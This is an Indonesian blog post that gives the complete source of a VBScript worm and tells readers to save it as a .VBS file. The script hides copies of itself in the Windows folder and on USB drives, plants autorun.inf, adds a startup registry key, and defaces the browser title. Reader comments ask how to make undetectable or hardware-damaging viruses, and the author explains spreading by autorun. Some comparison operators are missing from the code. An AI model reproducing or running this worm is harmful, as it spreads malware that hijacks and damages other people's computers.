Ketikan kode ini di notepad!!

Code:
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe MS32DLL.dll.vbs”
set fs = createobject(“Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\MS32DLL.dll.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\MS32DLL.dll.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “\MS32DLL.dll.vbs”)
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then
set tf=fs.getfile(flashdrive.path &”\MS32DLL.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\MS32DLL.dll.vbs”,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\MS32DLL.dll.vbs”)
tf.attributes =39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
set rg = createobject(“WScript.Shell”)
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,winpath&”\MS32DLL.dll.vbs”
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”Hacked by QQ Ow”
rg.regwrite “HKCR\vbsfile\DefaultIcon”,”shell32.dll,2″
if check 1 then
Wscript.sleep 200000
end if
loop while check1
set sd = createobject(“Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname

Simpan nama dengan nama terserah anda asalkan ekstensionnya menggunakan .VBS misalkan GUE.VBS

Segala kerusakan ditanggung yang nulis th script deh.
Hehehe…

14 Komentar

  1. Mas saya mencari script virus html pny ndak mas

  2. mas, aku pengen belajar buat virus.,
    carane byar cpet gmana yah.,.,

    bantuin aku dunk mas.,

  3. mas mo tny nih cara membuat viru perusak yg g bisa terditect ama antivirus n jg script ny……
    thank y mas……

  4. aku mau tanya mas…
    ada ga virus yang bisa merusak komponen komputer????
    klo ada bagaimana caranya????
    terima kasih…

  5. mas aku mau tanya gimana nyebarin virus ke fles dis

    • Yang jelas untuk menyebarkan virus ke flashdisk anda harus menggunakan autorun agar virus tsb dapat menyebar.
      Virus diatas selain menyerang system (:C), dapat menyerang partisi lain, dan juga menyerang flashdisk.

  6. Wah kalau membuat virus yang tidak terdetek anti virus itu memang susah mas.
    Kita harus tau banyak tentang program anti virus itu sendiri.
    Dan ditambah lagi AV yang melakukan update tiap harinya, maka makin susah juga virus bisa menyelinap.

  7. Maksud anda merusak hardware komputer??
    Kalau merusak bagian software memang itu sudah pasti.
    Tapi kalau virus yang dapat merusak hardware masih kurang tau deh.

  8. Mas softwarenya pembuat virus namanya apa n klau tau crinya dmna?
    thanks

    • Banyak software-software pembuat virus. Silahkan aja tanya ke Mbah Google
      Sebagai contoh kita dapat menggunakan visual basic untuk membuat virus, dan juga anda harus menguasai bahasa C++, dll.
      Dengan menggunakan notepad juga bisa, tetapi virus ini hanya memiliki beberapa ekstension, yang diantaranya adalah VBS dan Bat.
      Mungkin jika anda tahu lebih banyak silahkan dishare karena saya juga masih kurang ilmunya tentang virus. :)

  9. bos cr menyebar virusnya gmn th?


Tulis sebuah Komentar